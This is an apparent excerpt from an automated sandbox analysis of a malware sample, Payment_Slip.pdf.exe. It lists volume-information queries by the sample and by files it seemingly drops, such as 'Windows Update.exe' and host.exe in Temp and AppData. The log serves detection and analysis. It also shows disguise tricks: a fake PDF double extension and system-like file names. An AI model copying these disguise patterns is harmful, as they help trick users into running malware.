Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\flat_officeFontsPreview.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYML.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Users\user\AppData\Roaming\host.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\host.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Users\user\AppData\Local\Temp\conserver.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\conserver.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Payment_Slip.pdf.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Windows Update\Windows Update.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\mykksg\mykksg.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
